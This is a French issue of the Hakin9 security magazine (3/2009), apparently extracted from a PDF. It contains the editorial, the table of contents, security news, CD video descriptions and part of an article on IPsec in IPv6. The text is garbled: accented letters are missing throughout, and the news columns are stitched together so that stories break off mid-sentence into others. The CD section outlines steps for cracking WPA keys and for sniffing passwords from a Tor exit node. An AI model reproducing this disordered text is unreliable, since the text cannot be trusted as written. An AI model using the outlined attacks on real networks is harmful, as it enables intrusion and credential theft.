Hakin9 03 2009 FR

DITORIAL
CHERS LECTEURS,
Vous tenez entre les mains le numro 3/2009 de Hakin9. Vous y trouverez comme toujours diffrents sujets lis la scurit informatique. Comme vous le savez, la liste de technique de hacking est trs longue ; lìmagination des pirates ne cesse de nous surprendre. Mais rassurons-nous, chaque problme sa solution. Chaque attaque peut tre pare. Tout le monde le sais que trouver le moyen de stopper les pirates, qui sont omniprsents dans le monde entier, donne pas mal de satisfaction. Dans ce numro nous vous donnons quelques ides trs intressantes concernant les bases de donnes, la securisation des systmes et le danger de rseaux informatiques. Dàbord, nous vous invitons lire la deuxme partie de làrticle de Frdric Roudaut sur le protocole Ipv6. Cet article est destin vous faire apprhender les techniques fondamentales dÌPv6, le nouveau mode dàdressage et la configuration automatique. Ensuite, vous trouverez la rubrique Technique et le fameux Keylogger 2.0 crit par Antonio Fanell, qui vous prsentera comment utiliser ce keylogger 2.0 pour exploiter une faille XSS dùn site web. Dans la mme rubrique vous trouverez La scurit des systmes virtualiss de Julien Reveret de la socit iTrust. Vous verrez tout au long de cet article que les technologies de virtualisations peuvent servir aux codes malicieux et quèlles prsentent des failles qui peuvent rendre une infrastructure plus fragile. En ce qui concerne les failles, làrticle de Frdric Charpentier de la socit Xmco Partners vous en parlera aussi. Il vous montrera la face cache du ver Conficker qui est due un bug de type stack buffer overlow. Nous nàvons pas oubli de nos chers dbutants, qui ont srement envie de lire un article beaucoup plus facile et moins technique que les autres. Cette fois-ci nous avons choisi làrticle de Didier Sicchia qui parle de SPAM, SCAM et les attaques phishing. Làuteur vous expliquera les mthodes utilises par les pirates afin de constituer des listes importantes d'adresses lectroniques. En outre, nous vous proposons dàutres articles concernant les attaques et la scurit. Maintenant, quand vous avez dj en main des solutions concrtes et efficaces, vous pouvez enfin se mettre au travail pour les appliquer. Je voudrais remercier tous nos bta-testeurs qui nous aident beaucoup avec leurs critiques pertinentes. Ce sont leurs remarques qui nous permettent de prsenter ce numro en toute srnit. Si toutefois vous avez des suggestions faire, n`hsitez pas nous contacter. Soyez srs quèlles feront lòbjet de toute notre attention.
Bonne lecture ! Magorzata Kompiel Rdaction de Hakin9
3/2009 HAKIN9
SOMMAIRE
DOSSIER
10 Mcanismes IPv6 avancs
FRDRIC ROUDAUT Cet article est la suite de celui publi dans le numro prcdent destin vous faire apprhender les techniques fondamentales dIPv6, le nouveau mode dadressage, les mcanismes de communication sous-jacents, la configuration automatique bref lensemble des protocoles basiques qui composent larchitecture dIPv6. Cet article sera aussi l'occasion de vous initier la mise en uvre de ce nouveau protocole.
FOCUS
30 Conficker, le ver qui rveille la scurit informatique
FRDRIC CHARPENTIER, XMCO PARTNERS Conficker exploite une faille de scurit des systmes Windows publie et corrige en octobre 2008 par Microsoft. Cette faille, rfrence sous le code MS08067 ou CVE-2008-4250, est due un bug de type stack buffer overflow. Il s'agit donc d'un dbordement de tampon relativement classique. De surcroit, ce bug est situ dans une partie du code trs proche d'un prcdent bug critique, le bug MS06-040.
PRATIQUE
26 Les Failles CSRF, Quels sont les risques ?
PAUL AMAR Les failles Cross-Site Request Forgeries ou communment appeles CSRF ou encore XSRF restent un vecteur d'attaque trs mconnu par rapport d'autres vulnrabilits Web tels que les Injection SQL etc. Cependant de nombreux auteurs comme Norm Hardy (1988) ou encore Peter Watkins (2001) ont trait du sujet il y a quelques annes.
36
Benchmarking attacks
FABIEN KERBOUCI Il existe plusieurs mthodes pour obtenir des informations prives dune application sans mettre en dfaut son mode dexcution et en laissant lapplication et son environnement parfaitement intgres. Cest lenjeu des attaques par indicateurs ou benchmarking attacks.
BACKUP
42 Comprendre les algorithmes de compression de donnes
DIDIER SICCHIA Certes, le volume grandissant des disques durs apporte un certain confort dans
TECHNIQUE
48 La scurit des systmes virtualiss
JULIEN REVERET, ITRUST La virtualisation est la mode depuis quelques temps, il n'est pas rare dans un environnement de test de se trouver sur une machine virtuelle plutot que physique. Nous verrons tout au long de l'article que les technologies de virtualisations peuvent servir aux codes malicieux et qu'elles prsentent des failles qui peuvent rendre une infrastructure plus fragile.
HAKIN9 3/2009
SOMMAIRE
54 Scuriser la navigation Internet des utilisateurs
TONY FACHAUX Le web regorge de menaces de plus en plus varies. Le virus n'est plus la seule menace craindre. Une multitude de menaces, dont l'utilisateur lambda ne connat mme pas l'existence, font leur apparition. Spyware, botnet ou encore ransomware deviennent monnaie courante. Quelles menaces faut-il craindre aujourd'hui, et comment s'en protger ?
POUR LES DBUTANTS

72 Comment viter le SPAM, le SCAM et les attaques phishing
DIDIER SICCHIA Cet article explique les techniques propres aux spams, scams et les attaques par phishing. Nous expliquerons aussi les mthodes utilises par les pirates afin de constituer des listes importantes d'adresses lectroniques.
VARIA
06 En bref
Vous trouverez ici les nouvelles du monde de la scurit des systmes informatiques. Prpare par Christophe Ledorze Instructeur Linux Novell
58
Keylogger 2.0
ANTONIO FANELL Aujourdhui, on utilise de plus en plus de scripts asynchrones pour amliorer l'exprience utilisateur sur Internet. Cependant, des malwares nouvelle gnration voient le jour pour les exploiter. Dans cet article, vous apprendrez concevoir un keylogger Web 2.0 puis vous l'utiliserez pour exploiter une faille XSS d'un site web.
08
Sur le CD-ROM
Nous vous prsentons deux cours vido. Le premier 'Cracking WPA' explique comment mettre mal un rseau sans fil scuris grce au fameux protocole de cryptage WPA. Le deuxime, Tor Hacking assure que le rseau danonymat Tor nest pas aussi hermtique que lon peut penser.
78
Feuilleton
JULIEN RAEIS Les attaques hors-ligne
80
Interview
Nous vous invitons la lecture dèntretien avec AnneGalle Lunot, une jeune entrepreneuse passionne, qui a cr Zlites, une socit de prestations informatiques aux Mans (Sarthe, FR)
64
mission compromettante. Orage dans un verre d'eau ?
82
Dans le prochain numro
UKASZ MACIEJEWSKI Actuellement, quasiment toutes les informations sont vendre et constituent une marchandise trs prcieuse. Voulez-vous permettre les autres de vous les voler impunment ? L'attaque est la meilleure dfense une attaque lectromagntique.
Quelques mots sur les articles qui paratront dans le numro 4/2009 (38)
3/2009 HAKIN9
EN BREF
WARDRIVING A MUMBAI
La police Indienne s'est vu remettre des radars d'un nouveau genre dans ce corps de mtier, des sniffers wifi . En effet le Times of India rvle que suite aux attentats de Delhi et d'Ahmedabad, les agents de police de Mumbai et bientt ceux de Bombay ont pour ordre de contrler et de verbaliser les propritaires de reseaux Wifi accessibles et non verrouills (plus de 88%) au nom de l'article 149 du code pnal Indien, les dtenteurs de rseaux WEP seront quant eux fortement conseills de passer a des protocoles plus srs. Il semblerait, selon le quotidien, que des tracts de propagandes terroristes furent envoys par ce biais peu de temps avant les attaques la bombe . On pourrait penser que les terroristes potentiels trouverait refuge dans les cyber caf pour y lancer leur propagande, mais ceci est dj sous contrle depuis 2007, lors d'une vague d'installation de keyloggers. site Web de vrifier si un utilisateur est logu d'autres sites. Ainsi un esprit malsain peu assez aisment forger une page qui peut tre en mesure de dtecter, selon une liste prdfinie les connexions en cours d'un utilisateur vers les sites des banques connues. Il est alors possible de raliser une attaque classique de Phishing en proposant un pop-up aux couleurs des banques vises, poussant l'utilisateur se reloguer. Il ne reste plus notre attaquant que collecter ces accs et se connecter la place des ayants droits sur les sites banques afin d'accder l'ensemble des comptes de la victime. Donc dans tous les cas, il vaut mieux ne pas naviguer sur plusieurs sites en mme temps que votre session avec votre banque ou d'autres services de l'administration , et de privilgier le blocage des pop-up. a affirm Dave Perril vice prsident de Wand Worp. L'enqute a conclut qu'Everett a exploit une faille de scurit qu'il avait dcouvert durant son travail au sein de Wand. Je pense que le message retenir de ce triste exemple est l'importance du changement des mots de passe et la suppression de ses accs quand un membre de votre quipe vient de la quitter. ajouta Graham Cluley, consultant au sein de l'quipe d'antivirus Sophos. Finalement mme si quelques serveurs tombrent les dommages ne s'lvent pas au del de 50000$, mais cela aurait put atteindre les 4,25M$ si la charge avait continu son oeuvre.
TOUTES LES CARTES EN MAIN

Heartland Payment Systems, une firme dployant l'infrastructure de gestion des cartes de crdit dans plus de 250000 entreprises amricaines a alert ses usagers sur le fait que la scurit entourant leurs informations bancaires avait t compromises. En effet des enquteurs spcialiss d'une compagnie du New Jersey , The Priceton, ont affirm avoir trouv la semaine dernire des preuves irrfutables de dtournement des softs clients. Heartland s'excuse pour tous les dsagrments que cette situation a put caus a dclar le prsident et CFO Robert H.B Baldwin Jr. Heartland est profondment attach au maintien de la scurit des donnes du titulaire de la carte, et nous continuerons de faire tout ce qui est raisonnablement possible d'atteindre cet objectif. Selon la Banque Info Security, Heartland est le sixime plus grand organisme de paiements aux tatsUnis et gre 100 millions de transactions par mois. La socit a assur qu'elle travaillait de paire avec les enquteurs des services secrets amricains. Un site Web, www.2008breach.com, a galement t mis en place pour fournir des informations supplmentaires aux titulaires des cartes affectes par la compromission.
VENGEANCE, MALBOUFFE ET SABOTAGE

David Ernest Everett, 21 ans vient de plaider coupable dans l'affaire du piratage de plus de 1000 serveurs l'opposant a son ancien employeur Wand Corporation, Wand Corporation est connu pour tre en autre la firme en charge de l'administration du parc de serveur de chaines de Fast food tels que Pizza Hut, KFC, Burger King. Le jeune pirate risque 10 ans de prison pour avoir cr et lanc sur le rseau d'administration Wand 3 malwares devant pousser au crash des serveurs situs dans les chaines de restaurants. Ceci trois semaines aprs avoir t licenci pour des raisons inconnues.Ces serveurs taient en charge de la gestion des stocks aussi bien que de celle des caisses. Heureusement pour la firme, le crash orchestr n'a pas affect plus de 25 serveurs, les administrateurs de Wand ayant t inform rapidement des difficults techniques rencontres par les restaurants, ils ont pu enquter en temps et ainsi trouver la charge virale dpose par Everett. Une fois que nous avons t informs de la situation, nous avons t capables de minimiser les dgts .
UN VISAGE FAMILIER EST BIEN PLUS FACILE POUR TROMPER

Le groupe de chercheurs en scurit de Trusteer lead par Amit klein vient de mettre en lumire un nouveau scnario de Phishing qui encore une fois servirait dtourner les informations personnels des victimes lors de leurs connections sur les sites de leurs banques. Elle se base sur le simple constat qu'une personne reste facilement connecte au site de sa banque au cas o.., et que dans la pense commune la pop-up reste dans un coin ne relaye de toute faon que les informations apportes par sa banque, donc un site de confiance. Donc si aprs un certain temps, cette pop-up demande l'utilisateur de se rauthentifier ou de remplir une enqute de satisfaction rien ne semblera suspect . Pourtant une technique, le in-session phishing , lie a une faiblesse du moteur JavaScript commun tous les navigateurs (Opra, Internet Explorer, Firefox, Safari...) donne la possibilit un
6 HAKIN9 3/2009
PAS DE CIRCONSTANCES ATTNUANTES POUR ACID

Le jugement dans le procs d'un consultant amricain en scurit
EN BREF
informatique accus d'avoir pilot un gigantesque botnet est sur le point d'tre rendu. En effet John Kenneyh Schiefer, 28 ans, aurait t le chef d'orchestre d'une arme de 250000 zombies, tous infects par ses soins, dont le seul but tait de l'aider et aux deux autres amis aussi dans la capture de mots de passe, de donnes bancaires, l'infection d'autres machines ainsi que la transmission de ses accs d'autres crackers. Vu la manire avec laquelle ses crimes furent oprs, sa demande, pour pouvoir continuer d'exercer son mtier, elle a t rejet par le procureur. Celui i s'appuyant de plus sur un document de 31 pages numrant les mfaits informatiques et humains de AcidStorm ou Acid. La dfense quant elle ne put appuyer son argumentation que sur le fait que ses malwares ne causrent pas tant de dgts, et que l'accus avait t la cible d'abus sexuel. Si cet homme a t autoris tre un professionnel de la scurit, il dtruit la rputation des autres professionnels de la scurit a dclar Mark Rasch, un ancien procureur fdral li au secteur IT aujourd'hui spcialiste en crimes informatiques Bethesda dans le Maryland. La sentence sera rendue le 25 fvrier prochain, JK Schiefer risque 60 mois de prison, 1,7 millions de dollars d'amende et 5 ans de libert conditionnelle. Pour pouvoir s'installer, le ver commence par rechercher le fichier services.exe pour le signer. Il se rplique alors dans les rpertoire de Windows en prenant ayant mut en une DLL. Il finira par changer les dates lies son inode et a les calquer sur celles de kernel32.dll pour drouter un test de scurit de plus. Question propagation rseau, Microsoft indique : Conficker se charge en mmoire et se propage vers des adresses IP alatoires travers le rseau en exploitant une faille du service Windows Server . Si la faille est exploite, le ver commande l'ordinateur cible de copier le code du ver depuis l'ordinateur hte via HTTP et en utilisant un port alatoire ouvert par le ver . Outre le fait que le ver rinitialise les points de restauration du systme empchant tout retour arrire infection, il faut noter que ce ver dtermine la position gographique de la machine sur lequel il vient d'arriver et ainsi ne semble pas s'attaquer aux machines Ukrainiennes. rcupration d'information l'lvation des privilges en passant par l'exploitation d'une faille dont les plus courantes (XSS, SQL injection) furent expliques avec exemples l'appui. L'une des meilleures confrences sur la Scurit fut prsente par Victor Stinner qui introduisait son fuzzer Fusil, plateforme permttant de crer rapidement des fuzzers pour des applications. Pour mieux comprendre Fusil, il est revenu sur la notion de fuzzing pour valuer la capacit de raction d'un programme sur des valeurs non conformes, selon trois mthodes: l'alatoire pur; l'injection de faute dans des donnes valides; et la cration de tronon alatoire conforme aux spcifications. L'une des plus importantes confrences Systme fut celle prsente par H. Peter Anvin sur son one-night hacking SysLinux et le Dynamic Bootloading. SysLinux est un ensemble de bootloaders de diffrents types (PXELinux, SysLinux, IsoLinux,etc.), et est aisment modulable par des APIs fournis. La caractristique principale des SysLinux est qu'il dcouvre le systme au boot et non l'installation d'un OS, comme le fait Grub ou Lilo. Il est donc trs pratique pour les LiveCD ou CD d'installation Linux, car il permet de booter sur un noyau stable avant d'installer un OS. gPxeLinux est n des projets Etherboot et SysLinux pour crer un bootloader rseau complet supportant de nombreux protocoles rseaux permettant de rcuprer dynamiquement sur son poste un kernel distant. Autre grosse confrence Systme concernait le nouveau filesystem, Ext4, dploy en standard partir des noyaux Linux 2.6.28. Anime par Theodore Ts'o, cette confrence a dcrit comment Ext4 pallie aux limites d'Ext3, comme la taille limite 16To, les 32000 sousrpertoires possibles. Ext4 pallie tout cela en permettant la gestion d'un FS jusqu' 1 Eo (et une taille maximale de 16To par fichier) en ajoutant un bloc d'indirection de 48 bits. Ext4 ajoute galement des fonctionnalits fort apprciables, comme la pr-allocation d'inodes ou la dfragmentation chaud, qui fait d'Ext4 une bonne volution d'Ext3, en attendant BTRFS.
3/2009 HAKIN9 7
FOSDEM 2009, CHRISTOPHE ALLADOUM, CONSULTANT SCURIT (HSC)

Cette anne, le FOSDEM s'est tenu le week-end du 7-8 fvrier Bruxelles. Parmi les confrences les plus prises, figure Reverse Engineering of Network Protocol par Rob Savoye. Il expliquait sa dmarche pour crer Gnash en reversant le protocole propritaire d'Adobe RTMP (Real-Time Messaging Protocol) partir de l'analyse des traces rseau avec Wireshark ou nGrep, l'isolation de patterns hexadcimaux pour reconstituer les headers des paquets. Cela incluait galement un reverse engineering sur les binaires de Flash fournis par Adobe. Selon Rob, le Reverse Engineering est avant tout tre curieux et surtout (trs) patient. La Scurit a eu aussi son lot de confrences. La confrence de l'OWASP prsente par Matteo Meucci tait assez gnral quant aux tests d'intrusions sur les applications web. Les diffrentes approches(black/gray/white box) ont t expliques. Suite cela, il a cern les tapes d'une attaque rseau, de la
MICROSOFT PRDIT, SUGGRE ET CONSTATE

En octobre dernier la faille critique pour XP, 2000 et 2003 avait donn un bulletin d'alerte, le MS08-067 : Cette mise jour de scurit corrige une vulnrabilit cache dans le service Serveur. Cette faiblesse pourrait permettre l'excution de code distance si un systme affect recevait une requte RPC spcialement prpare. Sur les systmes Windows 2000, Windows XP et Windows Server 2003, un attaquant pourrait ainsi exploiter cette faille pour faire excuter du code arbitraire sans ncessiter d'authentification. Il serait possible d'utiliser cette vulnrabilit dans la cration d'un ver. C'est fait, et ce ver c'est Conficker.
SUR LE CD
CD-ROM HAKIN9.LIVE
VIDO CRACK DE CL WPA
Grce cette courte vido, nous allons aborder un sujet trs en vogue du moment : Les faiblesses du Wireless. Aprs avoir vu et revu de nombreuse fois que le cryptage WEP (Wired Equivalent Privacy) tait obsolte, il fut fortement conseill de passer au WPA (Wifi Ptrotected Access). Dans cette vido, nous allons donc voir comment mettre mal un rseau sans fil scuris grce au fameux protocole de cryptage WPA. Afin de procder, nous allons utiliser la clbre suite doutils Aircrack afin de nous aider dans cette tche. La suite aircrack comprend les outils suivants : aircrack-ng : casseur de cls WEP et WPA-PSK, aireplay-ng : programme d'injection de paquets 802.11, airodump-n : programme de capture de paquets 802.11.
Afin de pouvoir utiliser lensemble de cette suite sans aucun problme, nous allons utiliser le live CD spcialis en scurit : BackTrack. Backtrack dispose actuellement de 300 outils permettant davoir le maximum de chance darriver notre fin en ce qui concerne la mise mal des rseaux sans fil. Au cours de cette vido, nous allons donc approcher le crackage de cl WPA de cette manire :
paramtrage de la carte wifi, listing des rseaux quil est possible dattaquer, isolation du rseau de la victime, attaque par dsauthentification, dcouverte de la cl WPA grce une attaque par bruteforce.
Lensemble de ces tapes doivent imprativement tre ralis dans cet ordre dexcution.
VIDO TOR HACKING
Grce cette vido, nous allons pouvoir aborder un point de plus en plus important sur internet : Lanonymat. De nos jours, les motivations qui justifient le dsir de conserver l'anonymat sur Internet sont de plus en plus nombreuses mais galement de plus en plus varies. (Activits moralement discutables, pdophilie, fraude, piratage, tlchargement illgaux, pornographie, etc). Le rseau danonymat Tor (The Onion Router) est actuellement considr comme lun des moyens danonymat sur internet le plus sur. Au cours de cette vido nous allons vous simplement montrer que le rseau danonymat Tor nest pas aussi hermtique que lon peut le penser grce linstallation dun nud de sortie Tor ainsi que lanalyse du rseau grce des outils ddis cette tche. Au cours de cette vido, nous allons donc approcher le Hack de Tor de cette manire :
8 HAKIN9 3/2009
installation et configuration de Tor et de tout ses composants, configuration dun relais Tor permettant de relayer le trafic rseau, installation et mise en marche des analyseurs rseau (sniffer), rcupration de la liste des mots de passe durant la priode de lattaque.
Lensemble de ces tapes doivent imprativement tre ralis dans cet ordre dexcution.
Sil vous est impossible de lire le CD. et que ce dernier nest pas endommag physiquement, essayez de lire dans au moins 2 lecteurs diffrents.
En cas de problme avec votre CD, envoyez-nous un message ladresse suivante : cd@hakin9.org
3/2009 HAKIN9
DOSSIER
FRDRIC ROUDAUT
Mcanismes IPv6 avancs

Degr de difficult
Depuis les annes 80, lInternet connat un succs incroyable. La majeure partie des entreprises y est maintenant directement connecte, le nombre de particuliers dtenteur dun abonnement Internet auprs dun FAI (Fournisseur dAccs Internet) est en constante croissance.
u moment de la dfinition d'IPv6, de nouveaux besoins tels que la scurit, la mobilit sont apparus et ont pu tre pris en compte lors de la phase de standardisation. Ce chapitre prsente quelques-uns de ces mcanismes qui reprsentent une grande avance de la couche rseau.
Les services de scurisation offerts par ces 2 protocoles sont distincts : AH permet de s'assurer que l'metteur du message est bien celui qu'il prtend tre. Il sert aussi au contrle d'intgrit pour garantir au rcepteur que personne n'a modifi le contenu d'un message lors de son acheminement et peut optionnellement tre utilis pour la dtection des rejeux. ESP offre les mmes services quAH et permet en plus de chiffrer l'ensemble des paquets ou uniquement la charge utile. ESP garantit galement de faon limite l'intgrit du flux.
IPsec
IPsec est le protocole spcifiquement conu pour scuriser IPv6. Il permet de raliser des rseaux privs Virtuels ou VPNs (Virtual Private Networks) au niveau IP et offre les services :
CET ARTICLE EXPLIQUE...

Cet article est la suite de celui publi dans le numro prcdent destin vous faire apprhender les techniques fondamentales dIPv6, le nouveau mode dadressage, les mcanismes de communication sous-jacents, la configuration automatique bref lensemble des protocoles basiques qui composent larchitecture dIPv6.
dauthentification des donnes, de chiffrement de donnes, dintgrit des donnes pour garantir que les paquets nont pas t modifis durant leur acheminement, danti-rejeu afin de dtecter les ventuels paquets rejous par un attaquant.
Associations de scurit
Afin de scuriser les changes, les entits en prsence doivent bien videmment partager un ensemble commun dinformations telles que le protocole IPsec usit (AH ou ESP), les cls, les algorithmes Ces diffrentes informations constituent des associations de scurit ou SA (Security Association). Chaque association de scurit est identifie de manire unique par un triplet comprenant un indexe de paramtres de scurit SPI (Security Parameters Index), l'adresse du destinataire IP et le protocole de scurit AH ou ESP. Une association de scurit est unidirectionnelle. Une communication bidirectionnelle entre 2 entits ncessite donc l'utilisation de 2 associations de scurit.
CE QU'IL FAUT SAVOIR...

Afin dapprhender au mieux cet article, il est prfrable davoir des connaissances relativement solides dIPv4 et en particulier du modle en couche TCP/IP. Il est bien videmment judicieux davoir galement au pralable apprhend les notions explicites dans larticle prcdent. 10 HAKIN9 3/2009
Toute implmentation IPv6 se doit de lintgrer dans sa pile. Ce protocole est galement utilisable avec IPv4 mais lutilisation du NAT/PAT (Network Address Translation/Protocole Address Translation) en limite la mise en uvre.
Mcanismes IPsec
IPsec dfinit 2 protocoles de scurisation : AH (Authentication Header), ESP (Encryption Security Payload).
IPV6
Mode Transport et Tunnel
Les normes IPsec dfinissent deux modes distincts d'opration IPsec : le mode Transport et le mode Tunnel. Le mode Tunnel ne fonctionne que pour les datagrammes IP-in-IP. En mode Tunnel, le paquet IP interne dtermine la stratgie IPsec qui protge son contenu tandis quen mode Transport, l'entte extrieur dtermine la stratgie IPsec qui protge le paquet IP interne. Contrairement au mode Transport, le mode Tunnel ne permet pas l'en-tte IP extrieur de dicter la stratgie de son datagramme IP interne. Enfin dans les 2 modes, lentte extrieur est partiellement protg mais le mode Tunnel lavantage de protger intgralement son entte extrieur pouvant ainsi s'avrer fortement utile pour la cration de VPN. reprsentent lensemble commun minimum des implmentations dAH. Lors de la rception dun paquet AH, la pile IPsec dtecte lassociation de scurit concerne, en dduit les algorithmes et les cls associes, calcule la valeur du champ ICV et la compare avec la valeur fournie. Dans le cas o ces 2 valeurs concident lintgrit ainsi que lauthentification des champs concerns est assure. Ces champs diffrent selon le mode usit transport ou tunnel. Le rejeu des paquets est quant lui dtect par le champ Sequence Number incrment chaque paquet et galement protg par le champ ICV. Lauthentification et lintgrit portent donc sur : les octets situs au dessus de lextension dentte AH, certains champs de lentte IPv6 invariants lors de lacheminement du paquet, certains champs invariants des extensions dentte positionnes avant AH.
Mode Transport
En mode Transport lextension AH est insre aprs lentte IPv6 et avant les enttes de niveau transport (TCP, UDP). De plus, AH tant vue comme une extension dentte traite de bout en bout de la communication, celle-ci apparait aprs les extensions dentte Hop-By-Hop Option Header, Routing Header et Fragment Header. Lextension dentte Destination Options Header est quant- elle place indiffremment avant ou aprs.
AH (Authentication Header)
La mise en uvre dAH repose sur une extension dentte spcifique. Celle-ci est dfinie dans la Figure 1. Le rle des diffrents champs de lextension dentte AH est prcis dans le Tableau 1.
Protection AH et Algorithmes
AH suppose gnralement une implmentation des algorithmes suivants : HMAC-MD5-96 (Peut tre implment) : Cet algorithme produit une empreinte sur 128 bits tronque 96 bits pour le champ ICV de AH, HMAC-SHA1-96 (Doit tre implment) : Cet algorithme produit une empreinte sur 160 bits tronque 96 bits pour le champ ICV de AH, AES-XCBC-MAC-96 (Devrait tre implment) : Ce protocole utilise le chiffrement par bloc AES dans un mode d'opration de type compteur coupl code d'authentification MAC (CBC-MAC). Le compteur sert assurer un chiffrement sr en vitant d'avoir un vecteur d'initialisation identique pour chaque message alors que le code d'authentification permet de vrifier que le message n'a pas t altr. Cet algorithme produit galement une empreinte sur 96 bits pour le champ ICV de AH.
Les extensions dentte positionnes aprs AH ne sont pas modifies durant lacheminement des paquets; ce titre celles-ci sont protges par le champ ICV. Cette protection diffre pour les extensions denttes positionns avant AH, certains champs pouvant tre altrs par les routeurs prsents le long du chemin. Les sous-options prsentes dans les extensions headers Hop-By-Hop et Destination Options Header disposent dun bit positionn 1 si loption peut tre modifie le long du trajet. Dans le cas o ce bit nest pas positionn la sous-option est protge, dans le cas contraire les octets de la sous-option sont positionns 0 lors du calcul de lICV. Cette protection ne sapplique pas non plus sur lextension Fragment Headers
Listing 1. Structure gnrale du fichier setkey.conf

flush ; spdflush; #Configuration SPD #Configuration SAD spddump; dump esp ;
Listing 2. Configuration SPD sur 3ffe::1

spdadd -6 3ffe::1 3ffe::2 any -P out ipsec esp/transport//require; spdadd -6 3ffe::1 3ffe::3 any -P out ipsec esp/transport//require;
Listing 3. Configuration SAD sur 3ffe::1

add 3ffe::1 3ffe::2 esp 10 -E aes-cbc "aescbcencryption" -A hmac-sha1 "hmacsha1authenticati"; add 3ffe::1 3ffe::3 esp 11 -E 3des-cbc "3descbcencryptiontesting" -A hmac-sha1 "hmacsha1authenticati";
Listing 4. Configuration SPD et SAD sur 3ffe::2

spdadd -6 3ffe::1 3ffe::2 any -P in ipsec esp/transport//require; add 3ffe::1 3ffe::2 esp 10 -E aes-cbc "aescbcencryption" -A hmac-sha1 "hmacsha1authenticati";
Dautres algorithmes sont bien entendu utilisables, mais ceux prciss ci-dessus
3/2009 HAKIN9
1 1
DOSSIER
32 Bits Next Header Hdr Ext Len SPI Sequence Number ICV Padding RESERVED
Ces 2 parties sont dfinies dans la Figure 4. Le rle des diffrents champs de lextension dentte ESP est prcis dans le Tableau 3.
Figure 1. Extension dentte AH qui apparat uniquement aprs la phase dauthentification. La Figure 2 montre ainsi le positionnement de lextension dentte AH en mode transport ainsi que la porte de lauthentification/intgrit.
Protection ESP et Algorithmes

La protection dESP repose sur le choix des algorithmes dauthentification et de chiffrements. Ceux-ci peuvent tre distincts ou combins, c'est--dire quauthentification et chiffrement sont raliss par le mme algorithme. Dans le cas dune protection combine, ESP suggre lutilisation dAES-CCM ou AES-GCM dj utilis pour respectivement le 802.11i et le 802.1ae. Dans le cas dune protection spare, ESP suppose gnralement une implmentation des algorithmes dauthentification suivants : NULL Authentication (Peut tre implment), HMAC-MD5-96 (Peut tre implment) : Cet algorithme produit une empreinte
Mode Tunnel
En mode Tunnel lextension AH est insre avant lentte IPv6. Un nouvel entte IPv6 est alors insr en tte. La Figure 3 et le Tableau 2 prsentent le mode de construction de ce ne nouvel entte ainsi que le positionnement des champs de lentte Intrieur.
sur 128 bits tronque 96 bits pour le champ ICV de AH, HMAC-SHA1-96 (Doit tre implment) : Cet algorithme produit une empreinte sur 160 bits tronque 96 bits pour le champ ICV de AH, AES-XCBC-MAC-96 (Devrait tre implment) : Ce protocole utilise le chiffrement par bloc AES dans un mode d'opration de type compteur coupl code d'authentification MAC (CBC-MAC). Le compteur sert assurer un chiffrement sr en vitant d'avoir un vecteur d'initialisation identique pour chaque message alors que le code d'authentification permet de vrifier que le message n'a pas t altr. Cet algorithme produit galement une empreinte sur 96 bits pour le champ ICV de AH.
ESP (Encryption Security Payload)
Les algorithmes de chiffrements dfinis sont alors les suivants : NULL Encryption (Doit tre implment), AES-CBC (Doit tre implment) : AES supporte 3 tailles de cl : 128, 192 et 256 bits. La taille de cl par dfaut est de 128 bits. AES-CBC ncessite un IV de 16 octets, 3DES-CBC (Doit tre implment) : Cet algorithme utilise une cl effective de 192 bits. Il est ralis par application de 3 DES-CBC, chacun utilisant une cl de 64 bits (dont 8 bits de parit). 3DES-CBC ncessite un IV de 8 octets, AES-CTR (Devrait tre implment) : AES en mode compteur supporte 3 tailles de cl : 128, 192 et 256 bits. La taille de cl par dfaut est de 128 bits. AES-CTR ncessite un IV de 16 octets, DES-CBC (Ne devrait pas tre implment).
La mise en uvre dESP repose sur une extension dentte spcifique. Celle-ci se dcompose en 2
Paquet originel : IPv6 Option Header
Payload
Paquet authentifi : IPv6 Option Header 1 Authentification Partielle AH Option Header 2 Payload
Authentifie :
- Version - Payload Lenght - Next Header - Source Address - Destination Address
Authentifi
Figure 2. AH en mode transport

Paquet originel : IPv6 Option Header Payload
Paquet protg : Nouvel entte IPv6 Authentifie : AH IPv6 orginel Option Header Payload
- Version - Payload Lenght - Next Header - Source Address - Destination Address
Authentifi
Figure 3. AH en mode tunnel

12 HAKIN9 3/2009
Dautres algorithmes sont bien entendu utilisables, mais ceux prciss ci-dessus reprsentent lensemble commun minimum des implmentations dESP. Il est noter quune association de scurit ESP ne doit aucun moment utiliser conjointement un algorithme dauthentification et de chiffrement nul. En mode tunnel, ESP depuis sa dernire version, propose un mode de confidentialit de flux par lutilisation du champ TFC. Ce champ permet dadjoindre des octets de bourrage de taille alatoire. La taille ce
IPV6
3/2009 HAKIN9
13
DOSSIER
32 Bits SPI Tte ESP Sequence Number IV Payload TFC Padding Pad Lenght ICV Padding Next Header Queue ESP
Figure 6 et le tableau 4 prsentent le mode de construction de ce ne nouvel entte ainsi que le positionnement des champs de lentte Intrieur.Dans le cas dune utilisation en mode tunnel la totalit du paquet initial est donc chiffre.
Topologies de mises en uvre

IPsec a un intrt majeur principalement par son mode ESP dans le cas o lon souhaite : chiffrer et/ou authentifier du trafic de bout en bout ou jusqu une passerelle. Dans ce cas les entits en prsence doivent prfrentiellement disposer dun adressage public, le NAT tant assez difficilement compatible avec IPsec. Une telle topologie a un intrt majeur pour assurer la confidentialit entre 2 entits ou pour un utilisateur nomade par exemple, crer un VPN entre sites distants. Ce besoin intervient dans le cas o lon veut par exemple interconnecter des rseaux privs distants au travers d'un rseau public.
Figure 4. Extension dentte ESP champ ntant prcise par aucun autre champ, celle-ci peut tre dduite du champ Payload Length de lentte IP intrieure au tunnel. Ce champ TFC pourrait galement tre utilis en mode transport la condition bien entendu que le protocole de niveau transport comporte une indication sur la taille de sa charge utile (cas de TCP, UDP, ICMP). Lors de la rception dun paquet ESP, la pile IPsec dtecte lassociation de scurit concerne et en dduit les algorithmes et les cls associes. Si la protection en authentification est active, le rcepteur calcule lICV sur le paquet ESP sans ce champ ICV. Si le champ calcul concide avec le champ transmis, lintgrit est assure sur les champs concerns. Ces champs diffrent selon le mode usit, transport ou tunnel. Vient ensuite le dchiffrement du paquet avec lalgorithme et la cl fournie par lassociation de scurit. Le rejeu des paquets est quant lui dtect la manire dAH par le champ Sequence Number incrment chaque paquet et galement protg par le champ ICV. Le chiffrement porte donc sur les octets situs au dessus de lextension dentte ESP lexception des champs SPI, Sequence Number, ICV. Lauthentification ventuelle ralise par le champ ICV porte sur lensemble des octets situs au dessus de lextension dentte ESP. La Figure 5 montre ainsi le positionnement de lextension dentte ESP en mode transport ainsi que la porte de lauthentification/intgrit et du chiffrement.
Mode Tunnel
